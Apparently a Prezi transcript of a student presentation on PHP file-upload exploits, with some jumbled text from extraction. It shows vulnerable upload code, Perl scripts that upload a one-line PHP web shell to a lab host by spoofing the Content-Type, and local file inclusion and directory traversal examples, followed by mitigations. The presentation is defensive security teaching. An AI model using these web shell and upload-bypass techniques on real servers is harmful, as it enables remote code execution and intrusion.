Loading presentation...

Present Remotely

Send the link below via email or IM

Copy

Present to your audience

Start remote presentation

  • Invited audience members will follow you as you navigate and present
  • People invited to a presentation do not need a Prezi account
  • This link expires 10 minutes after you close the presentation
  • A maximum of 30 users can follow your presentation
  • Learn more about this feature in our knowledge base article

Do you really want to delete this prezi?

Neither you, nor the coeditors you shared it with will be able to recover it again.

DeleteCancel

Make your likes visible on Facebook?

Connect your Facebook account to Prezi and let your likes appear on your timeline.
You can change this under Settings & Account at any time.

No, thanks

PHP Exploits

csci6621 prezi
by

Matthew Rodriguez

on 20 April 2010

Comments (0)

Please log in to add your comment.

Report abuse

Transcript of PHP Exploits

PHP pjphp asdfasdjfljasdkfjakjsdkfjasdjfjsdjfljasdlkjflkajsdfj
aksdjfkajsdkfjlkajsdkfjkasjdf
asdjflkaskdjflkjasdkjf
PHP Exploitation 7. present on a report analyzing the above actions whitelisting/blacklisting IDS/IPS regular expressions 1. Gain an understanding of PHP and known exploits 2. develop a test environment 3. PHP Penetration testing 4. analyze and report on penetration testing 5. mitigate vulnerabilities in test environment by 6. PHP Penetration testing to assess mitigation Why did we choose this project? PHP background why is it vulnerable? Test Environment SECURE FILE UPLOAD IN A PHP WEB APPLICATION Conclusion Naive implementation of file upload Content-type verification Image file content verification File name extension verification Indirect access to the uploaded files Local file inclusion attacks Reference implementation Other issues <form name="upload" action="upload1.php" method="POST" ENCTYPE="multipart/form-data">
Select the file to upload: <input type="file" name="userfile">
<input type="submit" name="upload" value="upload">
</form>
<?php

$uploaddir = 'uploads/'; // Relative path under webroot
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);

if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
echo "File is valid, and was successfully uploaded.\n";
} else {
echo "File uploading failed.\n";
}
?>
Now we check the MIME type in the upload request and refuse the upload if it is not a GIF. $uploaddir = 'uploads/';
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);

if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
echo "File is valid, and was successfully uploaded.\n";
} else {
echo "File uploading failed.\n";
}
?>

#!/usr/bin/perl
#
use LWP;
use HTTP::Request::Common;

$ua = $ua = LWP::UserAgent->new;;

$res = $ua->request(POST 'http:// 192.168.5.128/php-file-upload/upload2.php',
Content_Type => 'form-data',
Content => [
userfile => ["shell.php", "shell.php", "Content-Type" =>"image/gif"],
],
);
print $res->as_string(); Here we add more security checking code to our original file upload code.
<?php

$imageinfo = getimagesize($_FILES['userfile']['tmp_name']);

if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg') {
echo "Sorry, we only accept GIF and JPEG images\n";
exit;
}

$uploaddir = 'uploads/';
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);

if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
echo "File is valid, and was successfully uploaded.\n";
} else {
echo "File uploading failed.\n";
Image formats allow a text comment. PHP interpreter sees executable PHP code inside and executes it. #!/usr/bin/perl
#

use LWP;
use HTTP::Request::Common;

$ua = $ua = LWP::UserAgent->new;;

$res = $ua->request(POST http://192.168.5.128/php-file-upload/upload3.php,
Content_Type => 'form-data',
Content => [
userfile => ["crocus.gif", "crocus.php", "Content-Type" =>"image/gif"],
],
);
print $res->as_string();
Here we consider a blacklist of extensions as shown below:
$imageinfo = getimagesize($_FILES['userfile']['tmp_name']);

if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg') {
echo "Sorry, we only accept GIF and JPEG images\n";
exit;
}
$uploaddir = 'uploads/';
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);

if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
echo "File is valid, and was successfully uploaded.\n";
} else {
echo "File uploading failed.\n";
}
?>
live demo Displaying files securely <?php
$uploaddir = 'c:/uploads/'; # Outside of web root
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);

if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
echo "File is valid, and was successfully uploaded.\n";
} else {
echo "File uploading failed.\n";
}
?>
<?php
$uploaddir = 'c:/uploads/';
$name = $_GET['name'];
readfile($uploaddir.$name);
?>
Directory Traversal Vulnerability The include function <?php
# ... some code here
if(isset($_COOKIE['lang'])) {
$lang = $_COOKIE['lang'];
} elseif (isset($_GET['lang'])) {
$lang = $_GET['lang'];
} else {
$lang = 'english';
}
include("language/$lang.php");
# ... some more code here
?>
Do not let user define file name on server We did not know ANYTHING about PHP No website adminitration background We wanted to learn something new PHP is an open source scripting language for web development to produce dynamic web pages. It is embedded into the HTML source document and interpreted by a web server with a PHP processor module PHP is not visible when you view the html source of a site Since open source, novice web developers copy and paste vulnerable code from the internet. Code contains vulnerable function calls, order of code, etc Developers don't understand PHP from a security standpoint Provided by URLs entered at BuiltWith.com and the Quantcast Top Million. Last calculated on April 15 2010 Framework Distribution of The Top Web Technologies Two Windows Server 2003 Standard Edition with Service Pack 2 and all up to date Microsoft updates software installed:
phpDesigner 7 - to write PHP code
wampServer 2.0i (July 11 2009) consisting of the following:
apache 2.2.11
PHP 5.3.0
MySQL 5.1.36
phpmyadmin
handling file uploads normally consists of two somewhat independent functions and both can be a source of security problems.


normally users will upload the files using a web form like the one shown below.
note: we found this type of example code all over the internet without any security measures in place.
(1) accepting files from a user.
(2) displaying files to the user. What is shell.php? <?php
system($_GET['command]);
?>
<?php
if($_FILES['userfile']['type'] != "image/gif") {
echo "Sorry, we only allow uploading GIF images";
exit;
} check the actual content of the uploaded file getimagesize() returns the size and type of the image PHP code inside GIF Code to change the Content Type Change .gif to .php in transit <?php
$blacklist = array(".php", ".phtml", ".php3", ".php4");

foreach ($blacklist as $item) {
if(preg_match("/$item\$/i", $_FILES['userfile']['name'])) {
echo "We do not allow uploading PHP files\n";
exit;
}
} we now have secure PHP file up load code We are still vulnerable because of a violated assumption: We assume the user can only uplaod files through PHP upload page But this assumption is not always true. MS IIS supports "PUT" HTTP request allows users to upload files directly and by pass PHP upload script Read only!!!! Change location of upload files to prevent direct web access Simple code to display file Allows PHP scripts to be dynamicaly added to websites based on user input Common example is changing the language of website an attacker can make a page include any file on the system with the .php extension. include() creates a HUGE security hole When combined with the Directory traversal vulnerablity Code common to multi-language sites randomly generate file names and keep track of them on a database by numeric index not by any part of the file name.
Now the uploaded files cannot easily be accessed directly though Directory Traversal Numerous other things to consider when implementing a file upload function DOS Performance Access Control things to remember:
to use system-generated file names instead of user supplied file names
don't just check if file is an image
don't just check file name extensions of uploaded files worst case scenario:
remote code execution vulnerabilities most important safeguard:
make uploaded files not available via
direct URL Trust:
your underpaid web administrator to write code?
websites you go to, always second guess their security!
Unintented Traversal to parent directory by adding ../ to the intended path attacker needs to guess how many directories to reach the correct parent Multipart Internet Mail Extention describs content types in general updates can change configs
Full transcript